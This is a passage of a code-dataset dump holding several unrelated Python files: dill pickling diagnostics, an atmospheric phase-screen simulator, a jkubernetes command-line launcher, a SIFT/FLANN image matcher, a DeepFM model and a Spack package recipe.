pickle\"\"\"\n from dill import pickles\n if not depth:\n if pickles(obj,exact,safe): return None\n return obj\n return dict(((attr, badobjects(getattr(obj,attr),depth-1,exact,safe)) \\\n for attr in dir(obj) if not pickles(getattr(obj,attr),exact,safe)))\n\ndef badtypes(obj, depth=0, exact=False, safe=False):\n \"\"\"get types for objects that fail to pickle\"\"\"\n from dill import pickles\n if not depth:\n if pickles(obj,exact,safe): return None\n return type(obj)\n return dict(((attr, badtypes(getattr(obj,attr),depth-1,exact,safe)) \\\n for attr in dir(obj) if not pickles(getattr(obj,attr),exact,safe)))\n\ndef errors(obj, depth=0, exact=False, safe=False):\n \"\"\"get errors for objects that fail to pickle\"\"\"\n from dill import pickles, copy\n if not depth:\n try:\n pik = copy(obj)\n if exact:\n assert pik == obj, \\\n \"Unpickling produces %s instead of %s\" % (pik,obj)\n assert type(pik) == type(obj), \\\n \"Unpickling produces %s instead of %s\" % (type(pik),type(obj))\n return None\n except Exception:\n import sys\n return sys.exc_info()[1]\n _dict = {}\n for attr in dir(obj):\n try:\n _attr = getattr(obj,attr)\n except Exception:\n import sys\n _dict[attr] = sys.exc_info()[1]\n continue\n if not pickles(_attr,exact,safe):\n _dict[attr] = errors(_attr,depth-1,exact,safe)\n return _dict\n\n\n# EOF\n"} {"ext": "py", "sha": "1a305deddb86a2c4ba2982c43b54d1ee77b798ba", "content": "from __future__ import division\n\nfrom .atmospheric_model import AtmosphericLayer, phase_covariance_von_karman, fried_parameter_from_Cn_squared\nfrom ..statistics import SpectralNoiseFactoryMultiscale\nfrom ..field import Field, RegularCoords, UnstructuredCoords, CartesianGrid\nfrom .finite_atmospheric_layer import FiniteAtmosphericLayer\n\nimport numpy as np\nfrom scipy import linalg\nfrom scipy.ndimage import affine_transform\n\nimport time\nimport warnings\n\nclass InfiniteAtmosphericLayer(AtmosphericLayer):\n\tdef __init__(self, input_grid, Cn_squared=None, L0=np.inf, velocity=0, height=0, stencil_length=2, use_interpolation=False):\n\t\tself._initialized = False\n\n\t\tAtmosphericLayer.__init__(self, input_grid, Cn_squared, L0, velocity, height)\n\n\t\t# Check properties of input_grid\n\t\tif not input_grid.is_('cartesian'):\n\t\t\traise ValueError('Input grid must be cartesian.')\n\t\tif not input_grid.is_regular:\n\t\t\traise ValueError('Input grid must be regularly spaced')\n\t\tif not input_grid.ndim == 2:\n\t\t\traise ValueError('Input grid must be two-dimensional.')\n\n\t\tself.stencil_length = stencil_length\n\t\tself.use_interpolation = use_interpolation\n\n\t\tself._make_stencils()\n\t\tself._make_covariance_matrices()\n\t\tself._make_AB_matrices()\n\t\tself._make_initial_phase_screen()\n\n\t\tself.center = np.zeros(2)\n\n\t\tself._initialized = True\n\t\n\tdef _recalculate_matrices(self):\n\t\tif self._initialized:\n\t\t\tself._make_covariance_matrices()\n\t\t\tself._make_AB_matrices()\n\t\n\tdef _make_stencils(self):\n\t\t# Vertical\n\t\tself.new_grid_bottom = CartesianGrid(RegularCoords(self.input_grid.delta, [self.input_grid.dims[0], 1], self.input_grid.zero - np.array([0, self.input_grid.delta[1]])))\n\t\t\n\t\tself.stencil_bottom = Field(np.zeros(self.input_grid.size, dtype='bool'), self.input_grid).shaped\n\t\tself.stencil_bottom[:self.stencil_length,:] = True\n\t\t\n\t\tfor i, n in enumerate(np.random.geometric(0.5, self.input_grid.dims[0])):\n\t\t\tself.stencil_bottom[(n + self.stencil_length - 1) % self.input_grid.dims[1],i] = True\n\t\t\n\t\tself.stencil_bottom = self.stencil_bottom.ravel()\n\t\tself.num_stencils_vertical = np.sum(self.stencil_bottom)\n\t\t\n\t\t# Horizontal\n\t\tself.new_grid_left = CartesianGrid(RegularCoords(self.input_grid.delta, [1, self.input_grid.dims[1]], self.input_grid.zero - np.array([self.input_grid.delta[0], 0])))\n\n\t\tself.stencil_left = Field(np.zeros(self.input_grid.size, dtype='bool'), self.input_grid).shaped\n\t\tself.stencil_left[:,:self.stencil_length] = True\n\t\t\n\t\tfor i, n in enumerate(np.random.geometric(0.5, self.input_grid.dims[1])):\n\t\t\tself.stencil_left[i,(n + self.stencil_length - 1) % self.input_grid.dims[0]] = True\n\t\t\n\t\tself.stencil_left = self.stencil_left.ravel()\n\t\tself.num_stencils_horizontal = np.sum(self.stencil_left)\n\t\n\tdef _make_covariance_matrices(self):\n\t\tphase_covariance = phase_covariance_von_karman(fried_parameter_from_Cn_squared(1, 1), self.L0)\n\n\t\t# Vertical\n\t\tx = np.concatenate((self.input_grid.x[self.stencil_bottom], self.new_grid_bottom.x))\n\t\tx = np.concatenate([x - xx for xx in x])\n\t\ty = np.concatenate((self.input_grid.y[self.stencil_bottom], self.new_grid_bottom.y))\n\t\ty = np.concatenate([y - yy for yy in y])\n\n\t\tseparations = CartesianGrid(UnstructuredCoords((x, y)))\n\t\tn = self.new_grid_bottom.size + self.num_stencils_vertical\n\t\tself.cov_matrix_vertical = phase_covariance(separations).reshape((n, n))\n\n\t\t# Horizontal\n\t\tx = np.concatenate((self.input_grid.x[self.stencil_left], self.new_grid_left.x))\n\t\tx = np.concatenate([x - xx for xx in x])\n\t\ty = np.concatenate((self.input_grid.y[self.stencil_left], self.new_grid_left.y))\n\t\ty = np.concatenate([y - yy for yy in y])\n\n\t\tseparations = CartesianGrid(UnstructuredCoords((x, y)))\n\t\tn = self.new_grid_left.size + self.num_stencils_horizontal\n\t\tself.cov_matrix_horizontal = phase_covariance(separations).reshape((n, n))\n\t\n\tdef _make_AB_matrices(self):\n\t\t# Vertical\n\t\tn = self.num_stencils_vertical\n\t\tcov_zz = self.cov_matrix_vertical[:n,:n]\n\t\tcov_xz = self.cov_matrix_vertical[n:, :n]\n\t\tcov_zx = self.cov_matrix_vertical[:n, n:]\n\t\tcov_xx = self.cov_matrix_vertical[n:, n:]\n\t\t\n\t\tcf = linalg.cho_factor(cov_zz)\n\t\tinv_cov_zz = linalg.cho_solve(cf, np.eye(cov_zz.shape[0]))\n\n\t\tself.A_vertical = cov_xz.dot(inv_cov_zz)\n\n\t\tBBt = cov_xx - self.A_vertical.dot(cov_zx)\n\n\t\tU, S, Vt = np.linalg.svd(BBt)\n\t\tL = np.sqrt(S[:self.input_grid.dims[0]])\n\n\t\tself.B_vertical = U * L\n\t\t\n\t\t# Horizontal\n\t\tn = self.num_stencils_horizontal\n\t\tcov_zz = self.cov_matrix_horizontal[:n,:n]\n\t\tcov_xz = self.cov_matrix_horizontal[n:, :n]\n\t\tcov_zx = self.cov_matrix_horizontal[:n, n:]\n\t\tcov_xx = self.cov_matrix_horizontal[n:, n:]\n\t\t\n\t\tcf = linalg.cho_factor(cov_zz)\n\t\tinv_cov_zz = linalg.cho_solve(cf, np.eye(cov_zz.shape[0]))\n\n\t\tself.A_horizontal = cov_xz.dot(inv_cov_zz)\n\n\t\tBBt = cov_xx - self.A_horizontal.dot(cov_zx)\n\n\t\tU, S, Vt = np.linalg.svd(BBt)\n\t\tL = np.sqrt(S[:self.input_grid.dims[1]])\n\n\t\tself.B_horizontal = U * L\n\n\tdef _make_initial_phase_screen(self):\n\t\toversampling = 16\n\t\tlayer = FiniteAtmosphericLayer(self.input_grid, self.Cn_squared, self.outer_scale, self.velocity, self.height, oversampling)\n\t\tself._achromatic_screen = layer.phase_for(1)\n\t\tself._shifted_achromatic_screen = self._achromatic_screen\n\n\tdef _extrude(self, where=None):\n\t\tflipped = (where == 'top') or (where == 'right')\n\t\thorizontal = (where == 'left') or (where == 'right')\n\n\t\tif where == 'top' or where == 'right':\n\t\t\tscreen = self._achromatic_screen[::-1]\n\t\telse:\n\t\t\tscreen = self._achromatic_screen\n\n\t\tif horizontal:\n\t\t\tstencil = self.stencil_left\n\t\t\tA = self.A_horizontal\n\t\t\tB = self.B_horizontal\n\t\telse:\n\t\t\tstencil = self.stencil_bottom\n\t\t\tA = self.A_vertical\n\t\t\tB = self.B_vertical\n\t\t\n\t\tstencil_data = screen[stencil]\n\t\trandom_data = np.random.normal(0, 1, size=B.shape[1])\n\t\tnew_slice = A.dot(stencil_data) + B.dot(random_data) * np.sqrt(self._Cn_squared)\n\n\t\tscreen = screen.shaped\n\n\t\tif horizontal:\n\t\t\tscreen = np.hstack((new_slice[:,np.newaxis], screen[:,:-1]))\n\t\telse:\n\t\t\tscreen = np.vstack((new_slice[np.newaxis,:], screen[:-1,:]))\n\t\t\n\t\tscreen = Field(screen, self.input_grid)\n\t\t\n\t\tif flipped:\n\t\t\tself._achromatic_screen = screen[::-1,::-1].ravel()\n\t\telse:\n\t\t\tself._achromatic_screen = screen.ravel()\n\n\tdef phase_for(self, wavelength):\n\t\treturn self._shifted_achromatic_screen / wavelength\n\n\tdef reset(self):\n\t\tself._make_initial_phase_screen()\n\t\tself.center = np.zeros(2)\n\t\tself._t = 0\n\t\n\tdef evolve_until(self, t):\n\t\tif t is None:\n\t\t\tself.reset()\n\t\t\treturn\n\t\t\n\t\told_center = np.round(self.center / self.input_grid.delta).astype('int')\n\n\t\tself.center = self.velocity * t\n\t\tnew_center = np.round(self.center / self.input_grid.delta).astype('int')\n\n\t\tdelta = new_center - old_center\n\n\t\tfor i in range(abs(delta[0])):\n\t\t\tif delta[0] < 0:\n\t\t\t\tself._extrude('left')\n\t\t\telse:\n\t\t\t\tself._extrude('right')\n\n\t\tfor i in range(abs(delta[1])):\n\t\t\tif delta[1] < 0:\n\t\t\t\tself._extrude('bottom')\n\t\t\telse:\n\t\t\t\tself._extrude('top')\n\t\t\n\t\tif self.use_interpolation:\n\t\t\t# Use bilinear interpolation to interpolate the achromatic phase screen to the correct position.\n\t\t\t# This is to avoid sudden shifts by discrete pixels.\n\t\t\tps = self._achromatic_screen.shaped\n\t\t\tsub_delta = self.center - new_center * self.input_grid.delta\n\t\t\twith warnings.catch_warnings():\n\t\t\t\twarnings.filterwarnings('ignore', message='The behaviour of affine_transform with a one-dimensional array supplied for the matrix parameter has changed in scipy 0.18.0.')\n\t\t\t\tself._shifted_achromatic_screen = affine_transform(ps, np.array([1,1]), (sub_delta / self.input_grid.delta)[::-1], mode='nearest', order=1).ravel()\n\t\telse:\n\t\t\tself._shifted_achromatic_screen = self._achromatic_screen\n\n\t@property\n\tdef Cn_squared(self):\n\t\treturn self._Cn_squared\n\t\n\t@Cn_squared.setter\n\tdef Cn_squared(self, Cn_squared):\n\t\tself._Cn_squared = Cn_squared\n\t\n\t@property\n\tdef outer_scale(self):\n\t\treturn self._L0\n\n\t@outer_scale.setter\n\tdef L0(self, L0):\n\t\tself._L0 = L0\n\n\t\tself._recalculate_matrices()"} {"ext": "py", "sha": "1a305f2fba69629b890dad5bc0f21b54b8cebba3", "content": "#!/bin/env python\n\nimport os \nimport sys\nimport random\nimport subprocess as sub\nimport getopt\nimport time\n\ndef identity(x):\n return x\n\ndef cygpath(x):\n command = [\"cygpath\", \"-wp\", x]\n p = sub.Popen(command,stdout=sub.PIPE)\n output, errors = p.communicate()\n lines = output.split(\"\\n\")\n return lines[0]\n\nif sys.platform == \"cygwin\":\n normclasspath = cygpath\nelse:\n normclasspath = identity\n\nCUSTOM_CONF_FILE = \"\"\nCONFIG_OPTS = []\nSTATUS = 0\nJKUBERNETES_DIR = \"/\".join(os.path.realpath( __file__ ).split(\"/\")[:-2])\nJKUBERNETES_CONF_DIR = os.getenv(\"JKUBERNETES_CONF_DIR\", JKUBERNETES_DIR + \"/conf\" )\nCONFIG_OPTS = []\nEXCLUDE_JARS = []\nINCLUDE_JARS = []\n\nAPI_SERVER_ADDRESS = \"\"\nJKUBERNETES_CREATE_YAML_PATH = \"\"\n\ndef check_java():\n check_java_cmd = 'which java'\n ret = os.system(check_java_cmd)\n if ret != 0:\n print(\"Failed to find java, please add java to PATH\")\n sys.exit(-1)\n\ndef print_commands():\n \"\"\"Print all client commands and link to documentation\"\"\"\n print (\"kubectl command [-s http://apiserverip:port]\")\n print (\"Commands:\\n\\t\", \"\\n\\t\".join(sorted(COMMANDS.keys())))\n print (\"\\nHelp:\", \"\\n\\thelp\", \"\\n\\thelp \")\n print (\"\\nDocumentation for the jkubernetes client can be found at https://github.com/gwisoft/jkubernetes/wiki/jkubernetes-Chinese-Documentation\\n\")\n\n\ndef get_jars_full(adir):\n ret = []\n temp = adir.strip()\n print (temp == \"\")\n \n if temp == \"\":\n return ret \n files = os.listdir(adir)\n for f in files:\n if f.endswith(\".jar\") == False:\n continue\n filter = False\n for exclude_jar in EXCLUDE_JARS:\n if f.find(exclude_jar) >= 0:\n filter = True\n break\n \n if filter == True:\n print (\"Don't add \" + f + \" to classpath\")\n else:\n ret.append(adir + \"/\" + f)\n return ret\n\n\ndef unknown_command(*args):\n print (\"Unknown command: [kubectl %s]\" % ' '.join(sys.argv[1:]))\n print_usage()\n \ndef print_usage(command=None):\n \"\"\"Print one help message or list of available commands\"\"\"\n if command != None:\n if command in COMMANDS:\n print (COMMANDS[command].__doc__ or \n \"No documentation provided for <%s>\" % command)\n else:\n print (\"<%s> is not a valid command\" % command)\n else:\n print_commands()\n\ndef parse_config_opts_and_args(args):\n\tcurr = args[:]\n\tcurr.reverse()\n\tconfig_list = []\n\targs_list = []\n\t\n\twhile len(curr) > 0:\n\t\ttoken = curr.pop()\n\t\tif token == \"-s\":\n\t\t\tglobal API_SERVER_ADDRESS\n\t\t\tAPI_SERVER_ADDRESS = curr.pop()\n\t\telif token == \"-c\":\n\t\t\tconfig_list.append(curr.pop())\t\n\t\telif token == \"--config\":\n\t\t\tglobal CUSTOM_CONF_FILE\n\t\t\tCUSTOM_CONF_FILE = curr.pop()\t\t\t\n\t\telse:\n\t\t\targs_list.append(token)\t\n\tprint (\"config_list=\")\n\tprint (config_list)\n\tprint (\"args_list=\")\n\tprint (args_list)\n\treturn config_list, args_list\n \ndef parse_config_opts(config_list):\n global CONFIG_OPTS\n if len(config_list) > 0:\n for config in config_list:\n CONFIG_OPTS.append(config) \n\ndef filter_array(array):\n ret = []\n for item in array:\n temp = item.strip()\n if temp != \"\":\n ret.append(temp)\n return ret \n\ndef get_config_opts():\n global CONFIG_OPTS\n print (\"-Dkubernetes.options=\" + (','.join(CONFIG_OPTS)).replace(' ', \"%%%%\"))\n return \"-Dkubernetes.options=\" + (','.join(CONFIG_OPTS)).replace(' ', \"%%%%\")\n \n\n#扩展的jar包入参 \ndef get_exclude_jars():\n global EXCLUDE_JARS\n return \" -Dexclude.jars=\" + (','.join(EXCLUDE_JARS)) \n\ndef create(args):\n\t\"\"\"\n\tkubectl create -f ***.yaml\n\t\"\"\"\n\tpass\n\n\targs = parse_client_createopts(args)\n\t\n\tchildopts = get_client_customopts() + get_exclude_jars() + get_client_createopts()\n\tprint (\"childopts=\")\n\tprint (childopts)\n\texec_jkubernetes_class(\n \"org.gwisoft.jkubernetes.kubectl.KubectlCreate\",\n jvmtype=\"-client -Xms256m -Xmx256m\",\n sysdirs=[JKUBERNETES_CONF_DIR, JKUBERNETES_DIR + \"/bin\",CUSTOM_CONF_FILE],\n args=args,\n childopts=childopts,\n isBackgroundRun=\"false\")\n\ndef kube(args):\n\t\"\"\"\n\tkubectl kube\n\t\"\"\"\n\tpass\n\t\n\tchildopts = get_client_customopts() + get_exclude_jars()\n\tprint (\"childopts=\")\n\tprint (childopts)\n\texec_jkubernetes_class(\n \"org.gwisoft.jkubernetes.daemon.kube.KubeServer\",\n jvmtype=\"-server -Xms256m -Xmx256m\",\n sysdirs=[JKUBERNETES_CONF_DIR, JKUBERNETES_DIR + \"/bin\",CUSTOM_CONF_FILE],\n args=args,\n childopts=childopts,\n isBackgroundRun=\"true\")\n\ndef kubelet(args):\n \"\"\"\n kubectl kubelet\n \"\"\"\n pass\n \n childopts = get_client_customopts() + get_exclude_jars()\n print (\"childopts=\")\n print (childopts)\n exec_jkubernetes_class(\n \"org.gwisoft.jkubernetes.daemon.kubelet.Kubelet\",\n jvmtype=\"-server -Xms256m -Xmx256m\",\n sysdirs=[JKUBERNETES_CONF_DIR, JKUBERNETES_DIR + \"/bin\",CUSTOM_CONF_FILE],\n args=args,\n childopts=childopts,\n isBackgroundRun=\"true\")\n \ndef delete(args):\n \"\"\"\n kubectl delete -f ***.yaml\n \"\"\"\n pass\n\n args = parse_client_createopts(args)\n \n childopts = get_client_customopts() + get_exclude_jars() + get_client_createopts()\n print (\"childopts=\")\n print (childopts)\n exec_jkubernetes_class(\n \"org.gwisoft.jkubernetes.kubectl.KubectlDelete\",\n jvmtype=\"-server -Xms256m -Xmx256m\",\n sysdirs=[JKUBERNETES_CONF_DIR, JKUBERNETES_DIR + \"/bin\",CUSTOM_CONF_FILE],\n args=args,\n childopts=childopts,\n isBackgroundRun=\"false\") \n \ndef rollingUpdate(args):\n \"\"\"\n kubectl rolling-update [old topology name] -f ***.yaml\n \"\"\"\n pass\n\n args = parse_client_createopts(args)\n \n childopts = get_client_customopts() + get_exclude_jars() + get_client_createopts()\n print (\"childopts=\")\n print (childopts)\n exec_jkubernetes_class(\n \"org.gwisoft.jkubernetes.kubectl.KubectlRollingUpdate\",\n jvmtype=\"-server -Xms256m -Xmx256m\",\n sysdirs=[JKUBERNETES_CONF_DIR, JKUBERNETES_DIR + \"/bin\",CUSTOM_CONF_FILE],\n args=args,\n childopts=childopts,\n isBackgroundRun=\"false\") \n \ndef replace(args):\n \"\"\"\n kubectl replace -f ***.yaml\n \"\"\"\n pass\n\n args = parse_client_createopts(args)\n \n childopts = get_client_customopts() + get_exclude_jars() + get_client_createopts()\n print (\"childopts=\")\n print (childopts)\n exec_jkubernetes_class(\n \"org.gwisoft.jkubernetes.kubectl.KubectlReplace\",\n jvmtype=\"-server -Xms256m -Xmx256m\",\n sysdirs=[JKUBERNETES_CONF_DIR, JKUBERNETES_DIR + \"/bin\",CUSTOM_CONF_FILE],\n args=args,\n childopts=childopts,\n isBackgroundRun=\"false\")\n \ndef get(args):\n \"\"\"\n kubectl get po [topology name]\n \"\"\"\n pass\n \n childopts = get_client_customopts() + get_exclude_jars()\n print (\"childopts=\")\n print (childopts)\n exec_jkubernetes_class(\n \"org.gwisoft.jkubernetes.kubectl.KubectlGet\",\n jvmtype=\"-server -Xms256m -Xmx256m\",\n sysdirs=[JKUBERNETES_CONF_DIR, JKUBERNETES_DIR + \"/bin\",CUSTOM_CONF_FILE],\n args=args,\n childopts=childopts,\n isBackgroundRun=\"false\") \n \t\ndef get_client_createopts():\n\tret = (\" -Dkubernetes.create.yaml=\" + JKUBERNETES_CREATE_YAML_PATH + \" -Dkubernetes.apiserver.address=\" + API_SERVER_ADDRESS)\n\treturn ret\n\ndef parse_client_createopts(args):\n\tprint (\"parse_client_createopts=\")\n\tprint (args)\n\tcurr = args\n\tcurr.reverse()\n\targs_list = []\n\twhile len(curr) > 0:\n\t\ttoken = curr.pop()\n\t\tprint (token == \"-f\")\n\t\tif token == \"-f\":\n\t\t\tglobal JKUBERNETES_CREATE_YAML_PATH\n\t\t\tJKUBERNETES_CREATE_YAML_PATH = curr.pop()\n\t\telse:\n\t\t\targs_list.append(token)\n\tprint (args_list)\t\t\n\treturn \targs_list\t\n\t\t\ndef exec_jkubernetes_class(klass, jvmtype=\"-server\", sysdirs=[], args=[], childopts=\"\",isBackgroundRun=\"\"):\n \n args_str = \" \".join(args)\n \n command = \"java \" + \" -Dkubernetes.home=\" + JKUBERNETES_DIR + \" \" + get_config_opts() + \" \" + childopts + \" -cp \" + get_classpath(sysdirs) + \" \" + klass + \" \" + args_str\n \n print (\"Running: \" + command)\n global STATUS\n STATUS = os.execvp(\"java\", filter_array(command.split(\" \")))\n\n#系统自定义的配置入参 \ndef get_client_customopts():\n ret = (\"\")\n \"\"\"\n ret = (\" -Dkubernetes.root.logger=INFO,stdout -Dlogback.configurationFile=\" + JKUBERNETES_DIR +\n \"/conf/client_logback.xml -Dlog4j.configuration=File:\" + JKUBERNETES_DIR + \n \"/conf/client_log4j.properties\")\n \"\"\" \n return ret\n\ndef get_classpath(extrajars):\n ret = []\n ret.extend(extrajars)\n ret.extend(get_jars_full(JKUBERNETES_DIR))\n ret.extend(get_jars_full(JKUBERNETES_DIR + \"/lib\"))\n ret.extend(INCLUDE_JARS)\n return normclasspath(\":\".join(ret))\n \n \t \ndef main():\n\tif len(sys.argv) <= 1:\n\t\tprint_usage()\n\t\tsys.exit(-1)\n\t\t\t\n\tglobal CONFIG_OPTS\n\tconfig_list, args = parse_config_opts_and_args(sys.argv[1:])\n\tparse_config_opts(config_list)\n\tCOMMAND = args[0]\n\tARGS = args[1:]\n\tif COMMANDS.get(COMMAND) == None:\n\t\tunknown_command(COMMAND)\n\t\tsys.exit(-1)\n\tif len(ARGS) != 0 and ARGS[0] == \"help\":\n\t\tprint_usage(COMMAND)\n\t\tsys.exit(0)\n\ttry:\n\t\t(COMMANDS.get(COMMAND,\"help\"))(ARGS)\n\texcept Exception as msg:\n\t\tprint(msg)\n\t\tprint_usage(COMMAND)\n\t\tsys.exit(-1)\n\tsys.exit(STATUS)\n\nCOMMANDS = {\"create\": create,\"kube\":kube,\"kubelet\":kubelet,\"delete\":delete,\"rolling-update\":rollingUpdate,\"replace\":replace,\"get\":get}\n\t\t \nif __name__ == \"__main__\":\n #check_java()\n main()\n"} {"ext": "py", "sha": "1a305f413095051a324e8a035128541b13d6768f", "content": "import cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nfrom .log import logger\n\nMATCHER_DEBUG = False\nFLANN_INDEX_KDTREE = 0\nGOOD_DISTANCE_LIMIT = 0.7\nSIFT = cv2.SIFT_create()\n\n\ndef is_in_poly(p, poly):\n \"\"\"\n :param p: [x, y]\n :param poly: [[], [], [], [], ...]\n :return:\n \"\"\"\n px, py = p\n is_in = False\n for i, corner in enumerate(poly):\n next_i = i + 1 if i + 1 < len(poly) else 0\n x1, y1 = corner\n x2, y2 = poly[next_i]\n if (x1 == px and y1 == py) or (x2 == px and y2 == py): # if point is on vertex\n is_in = True\n break\n if min(y1, y2) < py <= max(y1, y2): # find horizontal edges of polygon\n x = x1 + (py - y1) * (x2 - x1) / (y2 - y1)\n if x == px: # if point is on edge\n is_in = True\n break\n elif x > px: # if point is on left-side of line\n is_in = not is_in\n return is_in\n\n\nclass FlannBasedMatcher():\n\n def __init__(self, origin):\n self.origin = origin\n self.kp, self.des = SIFT.detectAndCompute(origin, None)\n logger.debug(f'FlannBasedMatcher init: shape ({origin.shape})')\n\n def match(self, query, ret_square=True, draw=False, scope=None):\n if self.des is None:\n logger.debug('feature points is None')\n if ret_square:\n return None\n return False\n\n if scope is not None:\n logger.debug(f'before: {len(self.kp)}')\n logger.debug(f'scope: {scope}')\n kp0, des0 = [], []\n for kp, des in zip(self.kp, self.des):\n if scope[0][0] <= kp.pt[0] and scope[0][1] <= kp.pt[1] and kp.pt[0] <= scope[1][0] and kp.pt[1] <= scope[1][1]:\n kp0.append(kp)\n des0.append(des)\n logger.debug(f'after: {len(kp0)}')\n kp0, des0 = np.array(kp0), np.array(des0)\n else:\n kp0, des0 = self.kp, self.des\n\n h, w = query.shape\n kp, des = SIFT.detectAndCompute(query, None)\n\n index_params = dict(algorithm=FLANN_INDEX_KDTREE, trees=5)\n search_params = dict(checks=50)\n flann = cv2.FlannBasedMatcher(index_params, search_params)\n matches = flann.knnMatch(des, des0, k=2)\n\n \"\"\"store all the good matches as per Lowe's ratio test.\"\"\"\n good = []\n for x, y in matches:\n if x.distance < GOOD_DISTANCE_LIMIT * y.distance:\n good.append(x)\n\n \"\"\"draw the result\"\"\"\n if draw:\n result = cv2.drawMatches(\n query, kp, self.origin, kp0, good, None)\n plt.imshow(result, 'gray')\n plt.show()\n\n if len(good) <= 4 or len(good) / len(des) < 0.2:\n logger.debug(\n f'not enough good matches are found: {len(good)} / {len(matches)} / {len(des)} / {len(good) / len(des)}')\n if ret_square:\n return None\n return False\n\n \"\"\"get the coordinates of good matches\"\"\"\n src_pts = np.float32(\n [kp[m.queryIdx].pt for m in good]).reshape(-1, 1, 2)\n dst_pts = np.float32(\n [kp0[m.trainIdx].pt for m in good]).reshape(-1, 1, 2)\n\n \"\"\"calculated transformation matrix and the mask\"\"\"\n M, mask = cv2.findHomography(src_pts, dst_pts, cv2.RANSAC, 5.0)\n matchesMask = mask.ravel().tolist()\n\n if M is None:\n logger.debug('calculated transformation matrix failed')\n if ret_square:\n return None\n return False\n\n pts = np.float32([[0, 0], [0, h-1], [w-1, h-1],\n [w-1, 0]]).reshape(-1, 1, 2)\n dst = cv2.perspectiveTransform(pts, M)\n dst_list = np.int32(dst).reshape(4, 2).tolist()\n\n better = filter(lambda m: is_in_poly(\n kp0[m.trainIdx].pt, dst_list), good)\n better_kp_x = [kp[m.queryIdx].pt[0] for m in better]\n if len(better_kp_x):\n good_area_rate = np.ptp(better_kp_x) / w\n else:\n good_area_rate = 0\n\n \"\"\"draw the result\"\"\"\n if draw or MATCHER_DEBUG:\n origin = np.array(self.origin)\n cv2.polylines(origin, [np.int32(dst)], True, 0, 2, cv2.LINE_AA)\n draw_params = dict(matchColor=(\n 0, 255, 0), singlePointColor=None, matchesMask=matchesMask, flags=2)\n result = cv2.drawMatches(\n query, kp, origin, kp0, good, None, **draw_params)\n plt.imshow(result, 'gray')\n plt.show()\n\n if abs(dst[0][0][0] - dst[1][0][0]) > 30 or abs(dst[2][0][0] - dst[3][0][0]) > 30 or abs(dst[0][0][1] - dst[3][0][1]) > 30 or abs(dst[1][0][1] - dst[2][0][1]) > 30:\n logger.debug(f'square is not rectangle: {dst_list}')\n if ret_square:\n return None\n return False\n\n if good_area_rate < 0.5:\n logger.debug(f'good_area_rate is not enough: {good_area_rate}')\n if ret_square:\n return None\n return False\n\n logger.info(\n f'matches: {len(good)} / {len(matches)} / {len(des)} / {len(good) / len(des)} / {good_area_rate}')\n\n logger.debug(f'find in {dst_list}')\n\n if ret_square:\n return dst_list\n return True\n"} {"ext": "py", "sha": "1a305f93b025dff8077f2da2ea70fa4f020a9213", "content": "# -*- coding:utf-8 -*-\n\"\"\"\nAuthor:\n Weichen Shen,wcshen1994@163.com\n\nReference:\n [1] Guo H, Tang R, Ye Y, et al. Deepfm: a factorization-machine based neural network for ctr prediction[J]. arXiv preprint arXiv:1703.04247, 2017.(https://arxiv.org/abs/1703.04247)\n\n\"\"\"\n\nimport tensorflow as tf\n\nfrom ..input_embedding import preprocess_input_embedding, get_linear_logit\nfrom ..layers.core import PredictionLayer, DNN\nfrom ..layers.interaction import FM\nfrom ..layers.utils import concat_fun\nfrom ..utils import check_feature_config_dict\n\n\ndef DeepFM(feature_dim_dict, embedding_size=8,\n use_fm=True, dnn_hidden_units=(128, 128), l2_reg_linear=0.00001, l2_reg_embedding=0.00001, l2_reg_dnn=0,\n init_std=0.0001, seed=1024, dnn_dropout=0, dnn_activation='relu', dnn_use_bn=False, task='binary'):\n \"\"\"Instantiates the DeepFM Network architecture.\n\n :param feature_dim_dict: dict,to indicate sparse field and dense field like {'sparse':{'field_1':4,'field_2':3,'field_3':2},'dense':['field_4','field_5']}\n :param embedding_size: positive integer,sparse feature embedding_size\n :param use_fm: bool,use FM part or not\n :param dnn_hidden_units: list,list of positive integer or empty list, the layer number and units in each layer of DNN\n :param l2_reg_linear: float. L2 regularizer strength applied to linear part\n :param l2_reg_embedding: float. L2 regularizer strength applied to embedding vector\n :param l2_reg_dnn: float. L2 regularizer strength applied to DNN\n :param init_std: float,to use as the initialize std of embedding vector\n :param seed: integer ,to use as random seed.\n :param dnn_dropout: float in [0,1), the probability we will drop out a given DNN coordinate.\n :param dnn_activation: Activation function to use in DNN\n :param dnn_use_bn: bool. Whether use BatchNormalization before activation or not in DNN\n :param task: str, ``\"binary\"`` for binary logloss or ``\"regression\"`` for regression loss\n :return: A Keras model instance.\n \"\"\"\n check_feature_config_dict(feature_dim_dict)\n\n deep_emb_list, linear_emb_list, dense_input_dict, inputs_list = preprocess_input_embedding(feature_dim_dict,\n embedding_size,\n l2_reg_embedding,\n l2_reg_linear, init_std,\n seed,\n create_linear_weight=True)\n\n linear_logit = get_linear_logit(linear_emb_list, dense_input_dict, l2_reg_linear)\n\n fm_input = concat_fun(deep_emb_list, axis=1)\n deep_input = tf.keras.layers.Flatten()(fm_input)\n fm_out = FM()(fm_input)\n deep_out = DNN(dnn_hidden_units, dnn_activation, l2_reg_dnn, dnn_dropout,\n dnn_use_bn, seed)(deep_input)\n deep_logit = tf.keras.layers.Dense(\n 1, use_bias=False, activation=None)(deep_out)\n\n if len(dnn_hidden_units) == 0 and use_fm == False: # only linear\n final_logit = linear_logit\n elif len(dnn_hidden_units) == 0 and use_fm == True: # linear + FM\n final_logit = tf.keras.layers.add([linear_logit, fm_out])\n elif len(dnn_hidden_units) > 0 and use_fm == False: # linear + Deep\n final_logit = tf.keras.layers.add([linear_logit, deep_logit])\n elif len(dnn_hidden_units) > 0 and use_fm == True: # linear + FM + Deep\n final_logit = tf.keras.layers.add([linear_logit, fm_out, deep_logit])\n else:\n raise NotImplementedError\n\n output = PredictionLayer(task)(final_logit)\n model = tf.keras.models.Model(inputs=inputs_list, outputs=output)\n return model\n"} {"ext": "py", "sha": "1a305ffdb17c2cb3c68761e651cdef0d1f01d549", "content": "# Copyright 2013-2019 Lawrence Livermore National Security, LLC and other\n# Spack Project Developers. See the top-level COPYRIGHT file for details.\n#\n# SPDX-License-Identifier: (Apache-2.0 OR MIT)\n\nfrom spack import *\n\n\nclass PyWidgetsnbextension(PythonPackage):\n \"\"\"IPython HTML widgets for Jupyter\"\"\"\n\n homepage = \"https://pypi.python.org/pypi/widgetsnbextension\"\n url = \"https://pypi.io/packages/source/w/widgetsnbextension/widgetsnbextension-1.2.6.tar.gz\"\n\n version('1.2.6', '0aa4e152c9ba2d704389dc2453f448c7')\n\n depends_on('py-setuptools', type='build')\n depends_on('python@2.7:2.8,3.3:')\n 